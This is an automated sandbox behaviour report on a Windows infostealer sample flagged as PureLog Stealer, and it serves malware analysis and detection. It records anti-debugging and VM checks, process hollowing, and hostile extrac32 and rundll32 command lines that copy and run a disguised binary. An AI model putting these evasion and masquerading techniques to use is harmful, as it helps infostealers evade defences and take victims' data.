Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592787	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592648	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592506	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592315	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592000	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591878	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591741	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591617	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591362	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599829
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599701
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599583
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599462
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599350
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599237
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599016
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598872
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598725
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598591
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598443
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598284
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598052
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597360
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597199
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597035
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596755
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596605
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596404
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596252
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596134
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595992
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595856
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595672
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595453
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595300
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595176
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594804
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594691
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594442
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594317
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594192
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594067
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593942
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593817
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593692
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593442
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593317
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593192
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 593067
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592942
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592817
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592704
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592442
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592317
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592191
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 592067
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591942
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591817
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591692
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591567
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591442
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591301
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591176
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 591051
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 590926
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 590801
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 590676
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 590551
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599890
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598905
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598787
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598671
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598562
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598453
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598344
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598234
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598125
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 598015
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597906
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597771
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597656
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597546
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597437
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597319
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597203
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 597081
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596953
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596839
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596584
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596468
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596359
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596250
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596140
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 596031
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595922
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595812
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595703
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595594
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595484
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595364
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595250
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595140
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 595031
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594922
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594812
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594703
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594594
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594484
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Thread delayed: delay time: 594374

Source: wscript.exe, 00000000.00000003.1698725179.0000020BDCDE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020021000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: wscript.exe, 00000000.00000003.1698725179.0000020BDCDE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6jdY5fA3bMSvmnETG8dos1fHzAOqXIpM%2FJOzz3JmoKnUwibfkfoNHXKWhl2rZd34HiBnm6Ntuqa7YhQEU4MjVP2%2FNRzEk%2BlktpW5Q741FhMEuLZK85McBMIR1O0DejTelw7GzvL"}],"group":"cf-nel","max_age":604800}
Source: x.exe, 00000001.00000002.1723017408.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B2D5000.00000004.00000020.00020000.00000000.sdmp, Naisrtpf.PIF, 00000009.00000002.1838305361.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, Naisrtpf.PIF, 0000000E.00000002.1916113346.0000000000716000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6jdY5fA3bMSvmnETG8dos1fHzAOqXIpM%2FJOzz3JmoKnUwibfkfoNHXKWhl2rZd34HiBnm6Ntuqa7YhQEU4MjVP2%2FNRzEk%2BlktpW5Q741FhMEuLZK85McBMIR1O0DejTelw7GzvL"}],"group":"cf-nel","max_age":604800}

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node	graph_1-26187
Source: C:\Users\Public\Libraries\fptrsiaN.pif	API call chain: ExitProcess graph end node	graph_6-83992
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\fptrsiaN.pif	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\fptrsiaN.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029DAEB0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

1_2_029DAEB0

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Process queried: DebugPort

Source: C:\Users\Public\Libraries\fptrsiaN.pif

Code function: 6_2_21147820 LdrInitializeThunk,

6_2_21147820

Source: C:\Users\Public\Libraries\fptrsiaN.pif

Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_0040CE09

Source: C:\Users\Public\Libraries\fptrsiaN.pif

6_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029D3E98 LoadLibraryW,GetProcAddress,FreeLibrary,

1_2_029D3E98

Source: C:\Users\Public\ndpha.pif

Code function: 8_2_00153F6B mov esi, dword ptr fs:[00000030h]

8_2_00153F6B

Source: C:\Users\Public\Libraries\fptrsiaN.pif

Code function: 6_2_0040ADB0 GetProcessHeap,HeapFree,

6_2_0040ADB0

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0040CE09
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0040E61C
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00416F6A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_004123F1 SetUnhandledExceptionFilter,	6_2_004123F1
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_1_0040CE09
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_1_0040E61C
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_1_00416F6A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_004123F1 SetUnhandledExceptionFilter,	6_1_004123F1
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00156510 SetUnhandledExceptionFilter,	8_2_00156510
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_001561C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_001561C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0040CE09
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0040E61C
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00416F6A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_004123F1 SetUnhandledExceptionFilter,	10_2_004123F1
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_1_0040CE09
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_1_0040E61C
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_1_00416F6A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_1_004123F1 SetUnhandledExceptionFilter,	10_1_004123F1

Source: C:\Users\Public\Libraries\fptrsiaN.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: x.exe.0.dr

Jump to dropped file

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\fptrsiaN.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: C:\Users\Public\Libraries\fptrsiaN.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory allocated: C:\Users\Public\Libraries\fptrsiaN.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\fptrsiaN.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section unmapped: C:\Users\Public\Libraries\fptrsiaN.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section unmapped: C:\Users\Public\Libraries\fptrsiaN.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\fptrsiaN.pif base: 2F0008	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory written: C:\Users\Public\Libraries\fptrsiaN.pif base: 3D0008	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Memory written: C:\Users\Public\Libraries\fptrsiaN.pif base: 215008

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Process created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Process created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	1_2_029C5510
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	1_2_029CA130
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	1_2_029CA17C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	1_2_029C561C
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: GetLocaleInfoA,	6_2_00417A20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: GetLocaleInfoA,	6_1_00417A20
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_02895510
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: GetLocaleInfoA,	9_2_0289A17C
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_0289561B
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: GetLocaleInfoA,	10_2_00417A20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: GetLocaleInfoA,	10_1_00417A20

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029C8BB0 GetLocalTime,

1_2_029C8BB0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029CB0B0 GetVersionExA,

1_2_029CB0B0

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
